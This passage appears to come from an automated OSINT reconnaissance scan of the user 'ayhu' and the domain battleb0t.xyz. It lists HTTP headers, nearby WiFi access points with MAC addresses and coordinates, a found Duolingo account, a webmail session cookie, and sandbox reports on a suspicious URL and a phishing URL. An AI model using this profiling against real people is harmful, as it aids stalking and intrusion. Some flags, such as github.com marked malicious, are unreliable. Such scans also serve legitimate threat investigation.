"https://lh3.googleusercontent.com/muc6rdfnYlghXu2auI9B_xTDc3DjGTqJEn7crw2warPYn2ynoswSQzMskhdwzSa3aGn5ZtN1FS5zt7F2RQ7kvbiXXA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7866, "name": "Boxel Rebound"}, "coabfkgengacobjpmdlmmihhhfnhbjdm": {"rating": 4.712575, "users": 200000, "platform": "", "short_description": "Draw anything and anywhere in real-time, an Paint online. 
Take a Screenshot of what you have drawn.", "icon": "https://lh3.googleusercontent.com/ATk-HSHUYW94gfeX1-QViI3E-R9ayz6L-z1kaWZHTbODo35loCLAgQQ0Dd7Iyo_WVwIKwwV5CZMKy4xSAim78-i5=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 334, "name": "Paint Tool for Chrome"}, "pgniedifoejifjkndekolimjeclnokkb": {"rating": 4.152824, "users": 100000, "platform": "", "short_description": "Twitch culture wherever you go! This extension replaces all Twitch.tv emote phrases with their actual emoticons.", "icon": "https://lh3.googleusercontent.com/wpEAZCTc19k3y0XQ7kjngo0zY2gDblkGn4E-sp41P9QZJyERCUErowcPq7IYEJDop6Nxk-Mnn5lJDVHm5TTOWMBpRw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 301, "name": "Global Twitch Emotes"}, "anflghppebdhjipndogapfagemgnlblh": {"rating": 4.5964994, "users": 1000000, "platform": "", "short_description": "Funny custom cursors for Chrome\u2122. Replace the default mouse cursor with a custom one from collections of cool and cute cursors.", "icon": "https://lh3.googleusercontent.com/9Sdk_yE3HogVcKV36GpAjo2WuW-KjYxE_OuLWGw_uQV55Nek_trNMqPxUADU2zteqtaZ2Nb6WOCWhbKODyPVCsfiFQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14912, "name": "Cute Cursors - Custom Cursor for Chrome\u2122"}, "mghabdfikjldejcdcmclcmpcmknjahli": {"rating": 4.4349837, "users": 100000, "platform": "", "short_description": "Bass Boost makes videos, songs, movies and more sound awesome by boosting your speakers or headphones.", "icon": "https://lh3.googleusercontent.com/S_ICtgwu98_1zAUeun5CjylcOZeR8R6CbFeny166JgpLD7X9ny67sPfFH8CH93K9h-4KaEOAsQ23UT_gslYKLgjSdw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1515, "name": "Bass Boost: HD Audio"}, "mkccemimdjbojildcllapppfhphcfmkn": {"rating": 4.3464284, "users": 100000, "platform": "", "short_description": "Funny and highly addictive Piggybank idle cash clicker game! 
From poor pig to a money rain maker!", "icon": "https://lh3.googleusercontent.com/MTOgoa-4pnm2oT718hOzu0s7AyYRh2Hktwursb3vRiYoLJ_NhpZbNlcitb9yqgjsq58Oeml6yG8rdTJTFDnJQ1AdlhY=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 280, "name": "PiggyBank Money Clicker - Idle Game"}, "eekbbmglbfldjpgbmajenafphnfjonnc": {"rating": 4.0141845, "users": 300000, "platform": "", "short_description": "Create and save drawings at the click of a button.", "icon": "https://lh3.googleusercontent.com/9Ss9Et8Wqx2wynjcCgVgKCrWKgQALgDa_5dS8BrLamdoaJxE23RUqPzUCOtPl6Z_4E0cOjPLFWD-LRrIiPTV7A4d=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 282, "name": "TinySketch"}, "mmgjkfjlmdkmoipndaeombfnomjfgeff": {"rating": 4.7636366, "users": 200000, "platform": "", "short_description": "Boxel Golf is a multiplayer golf game packed with challenging courses, custom hats, and a powerful level builder.", "icon": "https://lh3.googleusercontent.com/CJluh5KxvX9BptxcgNfGygJ_FrarOtaAENIzJt_PhpyYyFLIKwtbx_ibaBFihgBFBnjNHBw6Zqf780ki2rEgsTL-=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 110, "name": "Boxel Golf"}, "akimgimeeoiognljlfchpbkpfbmeapkh": {"rating": 4.464241, "users": 300000, "platform": "", "short_description": "Art masterpieces from Google Arts & Culture in your browser tabs", "icon": "https://lh3.googleusercontent.com/vb_gZQ1M8DRLziSDF2orUqqOxfS0R41P6ivGjESV-Wayt2PhEjjECCjqt6cFYjmFOiJc3tPNRlaH--bS4YgJ2_bUF1A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1594, "name": "Google Arts & Culture"}, "ejgnolahdlcimijhloboakpjogbfdkkp": {"rating": 4.363104, "users": 200000, "platform": "", "short_description": "Meow is a virtual Cat pet who walks on your screen while you're browsing the web.", "icon": "https://lh3.googleusercontent.com/bGSk3Ww67wjSEwL0G3NUzjrmdwxCc07Zqg-DJ86TCU-9wslcEtutlHV8sn5gszDzOVilT4LhvdkXedoS8bvuCN-PJ5Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1366, "name": "Meow, The Cat Pet"}, "ogadflejmplcdhcldlloonbiekhnlopp": {"rating": 4.765432, "users": 700000, "platform": "", 
"short_description": "Increase your max volume! Amplify sound by up to 600%. Control sound of any tab using audio equalizer.", "icon": "https://lh3.googleusercontent.com/i9-pwrYc-CjuOK3VW2wQHhWkBis2nQ_JtZLAqU36S-h3Ogx85OIj9ml3qLVEq_hb4mdaDCPm74nkFuLGN2AtvsQh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 324, "name": "VolumeUp - Sound booster"}, "gebbhagfogifgggkldgodflihgfeippi": {"rating": 4.8502846, "users": 4000000, "platform": "", "short_description": "Returns ability to see dislikes", "icon": "https://lh3.googleusercontent.com/X0-M21C_VbWyXYuUjN55oyMDvOukjbzAxbs_WrUjwzsebWbyjFCIEchOtczI0DBvbyL9MUpuEWnghm19gF6dp8Vriw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14581, "name": "Return YouTube Dislike"}, "mjjgmlmpeaikcaajghilhnioimmaibon": {"rating": 4.636716, "users": 600000, "platform": "", "short_description": "Boxel 3D is the 3rd release of your favorite box jumping game made by the developers of Boxel Rebound.", "icon": "https://lh3.googleusercontent.com/wJh9K6xTW1upb8nCKtceJ62mE4BWbS7o4RiQpNnxoATQ8sn5w6RIYK9e5B6vPBp8Ve-rw9ZC9s-fTn7aiiH211Xd=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1291, "name": "Boxel 3D"}, "cogmkaeijeflocngklepoknelfjpdjng": {"rating": 4.026706, "users": 100000, "platform": "", "short_description": "Powerful Video Downloader. 
Downloads most popular media formats like flash, videos, audios.", "icon": "https://lh3.googleusercontent.com/VlYizxdn50R6ZbmamuMJtMI0fLKaA1MQ9oZfGx3_Ewx-vHafh3aU3kcioZev8TGkc1bhrdEpYg9QRSlV2ip95SrWKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 337, "name": "Universal Video Downloader"}, "pjafcgbpdclmdeiipolenjgkikeldljl": {"rating": 4.6231885, "users": 100000, "platform": "", "short_description": "Play the piano in your browser", "icon": "https://lh3.googleusercontent.com/Qr_GTzNHNuRvSIDBRrVhDo_oe1X8lMQ4EeUvbHpXMn82tUSBxqqBrNTll4RwlrIAT8eT79cMTqE4XwkmlpsQXTeA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 69, "name": "Chrome Piano"}, "dlnkkghpoaboifilieokcpoclbhpoclo": {"rating": 4.610895, "users": 400000, "platform": "", "short_description": "The classic Flappy Bird game offline version on your Google Chrome! Free online Flappy Bird plat on Desktop. Flappy for Chrome.", "icon": "https://lh3.googleusercontent.com/NJeftxVVijTjJAjU513yZrpTnqhUaifchPG7ueRV4tbYdvyhLFzaxrv78efd89uuDttH5JGOEYGzyIWwmUpQXfwXKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 257, "name": "Flappy Bird Offline. 
Desktop Version"}, "gokcmhknbfbkchaljcbjloaebnoblcnd": {"rating": 4.47541, "users": 100000, "platform": "", "short_description": "Welcome to Arcade Classics - a free browser extension with 9 games to play!", "icon": "https://lh3.googleusercontent.com/INSecUCn41xlC2ZJ-EtqFbnHRT6NQ7rwnT-A3AHFZBqvHUO5znb9qBco8HWaXTsM09TceC152h7LIesE_ncO3GktDw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 61, "name": "Arcade Classics"}, "emeokgokialpjadjaoeiplmnkjoaegng": {"rating": 3.3394256, "users": 500000, "platform": "", "short_description": "Draw shapes, lines, and add text to live web pages and take screenshot.", "icon": "https://lh3.googleusercontent.com/Wafwq7jbZDxfLNCG587_eBMy91NkmSP2JFA3b4hWobkUAplS41SaW08gHYd8vcamJ1EPG5gQMPoQ_VDoVTNT9wH-KQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 766, "name": "Web Paint"}, "goiejopegncpjmocklmfiipofdbkhpic": {"rating": 4.5925927, "users": 100000, "platform": "", "short_description": "Doodle Jump! Jump and break your records!", "icon": "https://lh3.googleusercontent.com/sdyc5k0236GAl3UATyeaXTUVV7KzolMDZCdMo2ndFcYeMMX0hYvUNkCAf2hCBvnIZrd4NIjVJ41Huds2XMXL3qgo=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Doodle Jump Ninja"}, "fadndhdgpmmaapbmfcknlfgcflmmmieb": {"rating": 4.466354, "users": 1000000, "platform": "", "short_description": "Use a variety of unique faces on Twitch!", "icon": "https://lh3.googleusercontent.com/qeMTob_QmnY3Mt8c-PnUxLs8nA82SW2VNylqMQ70aSRfpHCDISNXQI_4CIaW9N-kFyfhiAGYZ4Gy2zU4EaD5QxEEL-Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 639, "name": "FrankerFaceZ"}, "bmjmipppabdlpjccanalncobmbacckjn": {"rating": 4.889806, "users": 200000, "platform": "", "short_description": "Cool, cute and funny cursors for Chrome\u2122, choose from hundreds of options.", "icon": "https://lh3.googleusercontent.com/cFDN-1ehvX3Ru1s02Aq68gnGJB2PyGa3Z1OfGXK7gWrvPYJZy7q68KxLX4Y5peQfd6aVYzNab2Kp7ZIxcOy1N_mcO4E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2060, "name": "Cursor style - custom cursor for your 
browser"}, "ogdlpmhglpejoiomcodnpjnfgcpmgale": {"rating": 4.716016, "users": 6000000, "platform": "", "short_description": "Fun custom cursors for Chrome\u2122. Use a large collection of free cursors or upload your own.", "icon": "https://lh3.googleusercontent.com/H2MMZR0mOR25jQf_4GdtDTufefua3igDkUq9TXdzfdqHXxkp9zfuVp3gSqAKRWGG2urjM0PlMIdLuZWcWRAtlUvZ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42439, "name": "Custom |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5cc474dd9f2b1c-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "webmailsession=%3aJ6wQNgi5mDSbd8Aj%2ccc122e301037955ff583c00e21431728; HttpOnly; path=/; port=2096; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2096; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096", "roundcube_cookies=enabled; HttpOnly; expires=Thu, 09-May-2024 16:40:03 GMT; path=/; port=2096; secure"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": 
["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:16:B6:17:24:0D) | 32.8608, -79.9746 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:DB:DA:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Intel Gateway (Net ID: 00:01:E6:96:87:21) | 39.0469, -77.4903 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | grasshopper2 (Net ID: 00:01:38:5A:88:28) | 37.780462,-122.390564 |
| 2023-05-12 02:53:49 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: A5D4:2C9F:2F6913:34928C:645D0975
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250052-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683818869.392299,VS0,VE127
Vary: Accept-Encoding
X-Fastly-Request-ID: 770beefb8a8eea06db7f3e4b2376459b2d1c2cbe
| 2606:50c0:8000::153 |
| 2023-05-12 02:55:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kekw.battleb0t.xyz/jar', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:348:120:WilError_01"\n "SM0:348:120:WilError_01"\n "SM0:348:304:WilStaging_02"\n "Local\\SM0:348:304:WilStaging_02"\n "SM0:7052:120:WilError_01"\n "SM0:7052:304:WilStaging_02"\n "Local\\SM0:7052:120:WilError_01"\n "Local\\SM0:7052:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:120:WilError_01"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar" (UID: 
00000000-00007052)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"64.226.81.43:49750"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kekw.battleb0t.xyz"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007052]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00007052]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007052]\n "Session_13324411891984663" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\manifest.fingerprint]- [targetUID: 00000000-00007052]\n "c920e640-3cd4-4291-b5a7-5ed9af660f2d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 
N/A]\n "ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp]- [targetUID: 00000000-00007052]\n "8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp]- [targetUID: 00000000-00007052]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007052]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007052]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7052_1944693387\\manifest.json]- [targetUID: 00000000-00007052]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp]- [targetUID: 00000000-00007052]\n "Tabs_13324411893998198" has type "data"- [targetUID: N/A]\n "643a517a-ab51-4a47-a7fa-e8480b929b43.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\643a517a-ab51-4a47-a7fa-e8480b929b43.tmp]- [targetUID: 00000000-00007052]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokenAndKey\\LOG]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://kekw.battleb0t.xyz/jar"\n Pattern match: "Math.PI/180"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://kekw.battleb0t.xyz"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "kekw.battleb0t.xyz/jar"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\7052_1268572528\\shoppingfre.js]- [targetUID: 00000000-00007052]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007052]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007052]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7052_16790919\\adblock_snippet.js]- [targetUID: 00000000-00007052]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\auto_open_controller.js]- [targetUID: 00000000-00007052]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping.js" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007052]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\shopping_iframe_driver.js]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0 | 64.226.81.43 |
| 2023-05-12 02:46:11 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [104.21.71.14] | 104.21.71.14 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5c8cb9da901236-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:48:38 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [www.github.com]
https://www.virustotal.com/en/domain/www.github.com/information/ | www.github.com |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Duolingo (Category: hobby)
https://www.duolingo.com/profile/ayhu | ayhu |
| 2023-05-12 02:57:23 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0.github.io |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.108 | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Amethyst (Net ID: 00:01:21:30:76:B7) | 41.8781, -87.6298 |
| 2023-05-12 02:57:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://userclient-maindeskamz6.duckdns.org', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 13, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://start.seitenatelier.ch/free/desk17/usa', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:120:WilError_01"\n 